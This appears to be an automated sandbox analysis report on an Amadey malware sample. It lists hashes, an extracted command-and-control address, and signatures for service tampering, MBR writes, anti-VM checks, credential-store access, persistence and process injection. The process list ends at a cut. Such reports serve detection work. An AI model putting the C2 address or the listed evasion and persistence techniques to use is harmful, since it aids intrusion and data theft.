Analysis
-
max time kernel
300s -
max time network
299s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
13-12-2022 05:05
Static task
static1
Behavioral task
behavioral1
Sample
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
Resource
win10-20220812-en
General
-
Target
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe
-
Size
5.5MB
-
MD5
dcded7ac014d98160a90789c615ae3cf
-
SHA1
e1f14ffa121e6618aaa5760c91d129503f7656da
-
SHA256
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995
-
SHA512
fec39d6dfd97ecc69ea85b18e8dfaadf84a2289a8b5eb6416918d0f7625897491a7a4302de0f1f16abbba2b906d0523affbfaa3198c583c21c53e883bba82f2c
-
SSDEEP
98304:IrxJwipiyZZ9RmdEeGCbGAstmlUse5mvKLgO/zhyPSp8616v+E7LF9yzTuU:INZpimLRvCbVlLnSg6piW+T4
Malware Config
Extracted
amadey
3.60
85.209.135.11/gjend7w/index.php
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
Processes:
Emit64.exepowershell.EXEsvchost.exedescription pid process target process PID 3632 created 3056 3632 Emit64.exe Explorer.EXE PID 3632 created 3056 3632 Emit64.exe Explorer.EXE PID 3632 created 3056 3632 Emit64.exe Explorer.EXE PID 3632 created 3056 3632 Emit64.exe Explorer.EXE PID 3632 created 3056 3632 Emit64.exe Explorer.EXE PID 3632 created 3056 3632 Emit64.exe Explorer.EXE PID 3632 created 3056 3632 Emit64.exe Explorer.EXE PID 4620 created 588 4620 powershell.EXE winlogon.exe PID 3956 created 4392 3956 svchost.exe DllHost.exe PID 3956 created 3728 3956 svchost.exe DllHost.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rundll32.exe -
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exerundll32.exeflow pid process 10 5108 rundll32.exe 11 3956 rundll32.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
Emit64.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts Emit64.exe -
Executes dropped EXE 8 IoCs
Processes:
gntuud.exegntuud.exeavicapn32.exeumciavi32.exeEmit64.exegntuud.exesvcupdater.exenvndrivesllapi.exepid process 4592 gntuud.exe 4504 gntuud.exe 2324 avicapn32.exe 5000 umciavi32.exe 3632 Emit64.exe 4604 gntuud.exe 4508 svcupdater.exe 3856 nvndrivesllapi.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rundll32.exe -
Loads dropped DLL 4 IoCs
Processes:
rundll32.exerundll32.exerundll32.exepid process 1084 rundll32.exe 5108 rundll32.exe 3956 rundll32.exe 3956 rundll32.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
gntuud.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\syncfiles.dll = "rundll32 C:\\Users\\Admin\\1000003062\\syncfiles.dll, rundll" gntuud.exe Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\umciavi32.exe = "C:\\Users\\Admin\\AppData\\Roaming\\1000006050\\umciavi32.exe" gntuud.exe -
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rundll32.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
rundll32.exedescription ioc process File opened for modification \??\PhysicalDrive0 rundll32.exe -
Drops file in System32 directory 5 IoCs
Processes:
powershell.EXEpowershell.EXEdescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
Processes:
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exegntuud.exeavicapn32.exerundll32.exeEmit64.exerundll32.exegntuud.exesvcupdater.exenvndrivesllapi.exepid process 2660 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe 2660 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe 4592 gntuud.exe 4592 gntuud.exe 2324 avicapn32.exe 2324 avicapn32.exe 5108 rundll32.exe 3632 Emit64.exe 3632 Emit64.exe 3956 rundll32.exe 3956 rundll32.exe 4604 gntuud.exe 4604 gntuud.exe 4508 svcupdater.exe 4508 svcupdater.exe 3856 nvndrivesllapi.exe 3856 nvndrivesllapi.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exegntuud.exeEmit64.exepowershell.EXEdescription pid process target process PID 2660 set thread context of 4092 2660 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe PID 4592 set thread context of 4504 4592 gntuud.exe gntuud.exe PID 3632 set thread context of 2160 3632 Emit64.exe dialer.exe PID 4620 set thread context of 2492 4620 powershell.EXE dllhost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1936 sc.exe 2712 sc.exe 4920 sc.exe 2564 sc.exe 3612 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4232 4508 WerFault.exe svcupdater.exe 1096 4392 WerFault.exe DllHost.exe 2308 3728 WerFault.exe DllHost.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4228 schtasks.exe 4636 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exegntuud.exeavicapn32.exeumciavi32.exeEmit64.exerundll32.exegntuud.exesvcupdater.exepowershell.exepowershell.exepid process 2660 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe 2660 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe 4592 gntuud.exe 4592 gntuud.exe 2324 avicapn32.exe 2324 avicapn32.exe 2324 avicapn32.exe 2324 avicapn32.exe 2324 avicapn32.exe 2324 avicapn32.exe 2324 avicapn32.exe 2324 avicapn32.exe 2324 avicapn32.exe 2324 avicapn32.exe 2324 avicapn32.exe 2324 avicapn32.exe 5000 umciavi32.exe 5000 umciavi32.exe 5000 umciavi32.exe 5000 umciavi32.exe 5000 umciavi32.exe 3632 Emit64.exe 3632 Emit64.exe 3956 rundll32.exe 3956 rundll32.exe 3956 rundll32.exe 3956 rundll32.exe 3956 rundll32.exe 3956 rundll32.exe 3956 rundll32.exe 3956 rundll32.exe 4604 gntuud.exe 4604 gntuud.exe 4508 svcupdater.exe 4508 svcupdater.exe 4508 svcupdater.exe 4508 svcupdater.exe 4508 svcupdater.exe 4508 svcupdater.exe 4508 svcupdater.exe 4508 svcupdater.exe 4508 svcupdater.exe 4508 svcupdater.exe 4508 svcupdater.exe 4508 svcupdater.exe 3632 Emit64.exe 3632 Emit64.exe 1512 powershell.exe 1512 powershell.exe 1512 powershell.exe 3632 Emit64.exe 3632 Emit64.exe 3632 Emit64.exe 3632 Emit64.exe 3632 Emit64.exe 3632 Emit64.exe 548 powershell.exe 548 powershell.exe 548 powershell.exe 3632 Emit64.exe 3632 Emit64.exe 3632 Emit64.exe 3632 Emit64.exe 3632 Emit64.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exegntuud.exepid process 2660 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe 4592 gntuud.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 1512 powershell.exe Token: SeIncreaseQuotaPrivilege 1512 powershell.exe Token: SeSecurityPrivilege 1512 powershell.exe Token: SeTakeOwnershipPrivilege 1512 powershell.exe Token: SeLoadDriverPrivilege 1512 powershell.exe Token: SeSystemProfilePrivilege 1512 powershell.exe Token: SeSystemtimePrivilege 1512 powershell.exe Token: SeProfSingleProcessPrivilege 1512 powershell.exe Token: SeIncBasePriorityPrivilege 1512 powershell.exe Token: SeCreatePagefilePrivilege 1512 powershell.exe Token: SeBackupPrivilege 1512 powershell.exe Token: SeRestorePrivilege 1512 powershell.exe Token: SeShutdownPrivilege 1512 powershell.exe Token: SeDebugPrivilege 1512 powershell.exe Token: SeSystemEnvironmentPrivilege 1512 powershell.exe Token: SeRemoteShutdownPrivilege 1512 powershell.exe Token: SeUndockPrivilege 1512 powershell.exe Token: SeManageVolumePrivilege 1512 powershell.exe Token: 33 1512 powershell.exe Token: 34 1512 powershell.exe Token: 35 1512 powershell.exe Token: 36 1512 powershell.exe Token: SeDebugPrivilege 548 powershell.exe Token: SeShutdownPrivilege 2848 powercfg.exe Token: SeCreatePagefilePrivilege 2848 powercfg.exe Token: SeShutdownPrivilege 3652 powercfg.exe Token: SeCreatePagefilePrivilege 3652 powercfg.exe Token: SeShutdownPrivilege 4560 powercfg.exe Token: SeCreatePagefilePrivilege 4560 powercfg.exe Token: SeShutdownPrivilege 4000 powercfg.exe Token: SeCreatePagefilePrivilege 4000 powercfg.exe Token: SeIncreaseQuotaPrivilege 548 powershell.exe Token: SeSecurityPrivilege 548 powershell.exe Token: SeTakeOwnershipPrivilege 548 powershell.exe Token: SeLoadDriverPrivilege 548 powershell.exe Token: SeSystemProfilePrivilege 548 powershell.exe Token: SeSystemtimePrivilege 548 powershell.exe Token: SeProfSingleProcessPrivilege 548 powershell.exe Token: SeIncBasePriorityPrivilege 548 powershell.exe Token: SeCreatePagefilePrivilege 548 powershell.exe Token: SeBackupPrivilege 548 powershell.exe Token: SeRestorePrivilege 548 powershell.exe Token: SeShutdownPrivilege 548 powershell.exe Token: SeDebugPrivilege 548 powershell.exe Token: SeSystemEnvironmentPrivilege 548 powershell.exe Token: SeRemoteShutdownPrivilege 548 powershell.exe Token: SeUndockPrivilege 548 powershell.exe Token: SeManageVolumePrivilege 548 powershell.exe Token: 33 548 powershell.exe Token: 34 548 powershell.exe Token: 35 548 powershell.exe Token: 36 548 powershell.exe Token: SeIncreaseQuotaPrivilege 548 powershell.exe Token: SeSecurityPrivilege 548 powershell.exe Token: SeTakeOwnershipPrivilege 548 powershell.exe Token: SeLoadDriverPrivilege 548 powershell.exe Token: SeSystemProfilePrivilege 548 powershell.exe Token: SeSystemtimePrivilege 548 powershell.exe Token: SeProfSingleProcessPrivilege 548 powershell.exe Token: SeIncBasePriorityPrivilege 548 powershell.exe Token: SeCreatePagefilePrivilege 548 powershell.exe Token: SeBackupPrivilege 548 powershell.exe Token: SeRestorePrivilege 548 powershell.exe Token: SeShutdownPrivilege 548 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
dwm.exepid process 1012 dwm.exe 1012 dwm.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exegntuud.exegntuud.exepid process 2660 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe 4592 gntuud.exe 4604 gntuud.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exegntuud.exegntuud.execmd.exerundll32.exeavicapn32.execmd.execmd.execmd.exedescription pid process target process PID 2660 wrote to memory of 4092 2660 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe PID 2660 wrote to memory of 4092 2660 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe PID 2660 wrote to memory of 4092 2660 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe PID 2660 wrote to memory of 4092 2660 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe PID 4092 wrote to memory of 4592 4092 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe gntuud.exe PID 4092 wrote to memory of 4592 4092 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe gntuud.exe PID 4092 wrote to memory of 4592 4092 7c5189d18f6898c9ae9456d0166348caf5499ce058468d99000d87dad21b6995.exe gntuud.exe PID 4592 wrote to memory of 4504 4592 gntuud.exe gntuud.exe PID 4592 wrote to memory of 4504 4592 gntuud.exe gntuud.exe PID 4592 wrote to memory of 4504 4592 gntuud.exe gntuud.exe PID 4592 wrote to memory of 4504 4592 gntuud.exe gntuud.exe PID 4504 wrote to memory of 4228 4504 gntuud.exe schtasks.exe PID 4504 wrote to memory of 4228 4504 gntuud.exe schtasks.exe PID 4504 wrote to memory of 4228 4504 gntuud.exe schtasks.exe PID 4504 wrote to memory of 4244 4504 gntuud.exe cmd.exe PID 4504 wrote to memory of 4244 4504 gntuud.exe cmd.exe PID 4504 wrote to memory of 4244 4504 gntuud.exe cmd.exe PID 4244 wrote to memory of 2644 4244 cmd.exe cmd.exe PID 4244 wrote to memory of 2644 4244 cmd.exe cmd.exe PID 4244 wrote to memory of 2644 4244 cmd.exe cmd.exe PID 4244 wrote to memory of 5024 4244 cmd.exe cacls.exe PID 4244 wrote to memory of 5024 4244 cmd.exe cacls.exe PID 4244 wrote to memory of 5024 4244 cmd.exe cacls.exe PID 4244 wrote to memory of 5012 4244 cmd.exe cacls.exe PID 4244 wrote to memory of 5012 4244 cmd.exe cacls.exe PID 4244 wrote to memory of 5012 4244 cmd.exe cacls.exe PID 4244 wrote to memory of 4892 4244 cmd.exe cmd.exe PID 4244 wrote to memory of 4892 4244 cmd.exe cmd.exe PID 4244 wrote to memory of 4892 4244 cmd.exe cmd.exe PID 4244 wrote to memory of 4976 4244 cmd.exe cacls.exe PID 4244 wrote to memory of 4976 4244 cmd.exe cacls.exe PID 4244 wrote to memory of 4976 4244 cmd.exe cacls.exe PID 4244 wrote to memory of 1064 4244 cmd.exe cacls.exe PID 4244 wrote to memory of 1064 4244 cmd.exe cacls.exe PID 4244 wrote to memory of 1064 4244 cmd.exe cacls.exe PID 4504 wrote to memory of 1084 4504 gntuud.exe rundll32.exe PID 4504 wrote to memory of 1084 4504 gntuud.exe rundll32.exe PID 4504 wrote to memory of 1084 4504 gntuud.exe rundll32.exe PID 4504 wrote to memory of 2324 4504 gntuud.exe avicapn32.exe PID 4504 wrote to memory of 2324 4504 gntuud.exe avicapn32.exe PID 4504 wrote to memory of 2324 4504 gntuud.exe avicapn32.exe PID 1084 wrote to memory of 5108 1084 rundll32.exe rundll32.exe PID 1084 wrote to memory of 5108 1084 rundll32.exe rundll32.exe PID 4504 wrote to memory of 5000 4504 gntuud.exe umciavi32.exe PID 4504 wrote to memory of 5000 4504 gntuud.exe umciavi32.exe PID 4504 wrote to memory of 3632 4504 gntuud.exe Emit64.exe PID 4504 wrote to memory of 3632 4504 gntuud.exe Emit64.exe PID 2324 wrote to memory of 4788 2324 avicapn32.exe cmd.exe PID 2324 wrote to memory of 4788 2324 avicapn32.exe cmd.exe PID 2324 wrote to memory of 4788 2324 avicapn32.exe cmd.exe PID 4788 wrote to memory of 4636 4788 cmd.exe schtasks.exe PID 4788 wrote to memory of 4636 4788 cmd.exe schtasks.exe PID 4788 wrote to memory of 4636 4788 cmd.exe schtasks.exe PID 4504 wrote to memory of 3956 4504 gntuud.exe rundll32.exe PID 4504 wrote to memory of 3956 4504 gntuud.exe rundll32.exe PID 4504 wrote to memory of 3956 4504 gntuud.exe rundll32.exe PID 1184 wrote to memory of 2712 1184 cmd.exe sc.exe PID 1184 wrote to memory of 2712 1184 cmd.exe sc.exe PID 4100 wrote to memory of 2848 4100 cmd.exe powercfg.exe PID 4100 wrote to memory of 2848 4100 cmd.exe powercfg.exe PID 4100 wrote to memory of 3652 4100 cmd.exe powercfg.exe PID 4100 wrote to memory of 3652 4100 cmd.exe powercfg.exe PID 1184 wrote to memory of 4920 1184 cmd.exe sc.exe PID 1184 wrote to memory of 4920 1184 cmd.exe sc.exe -
outlook_win_path 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:588
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
PID:1012 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{909ce20a-1543-4682-9bd7-cb5be8355741}2⤵PID:2492
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:64
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1232
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1360
-
c:\windows\system32\sihost.exesihost.exe2⤵PID:2364
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1424
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s FontCache1⤵PID:1488
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1560
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1764
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1792
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1804
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1976
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:1000
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2456
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2472
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2536
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵PID:2608
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2724
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2740
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2900
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2760
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3056
-
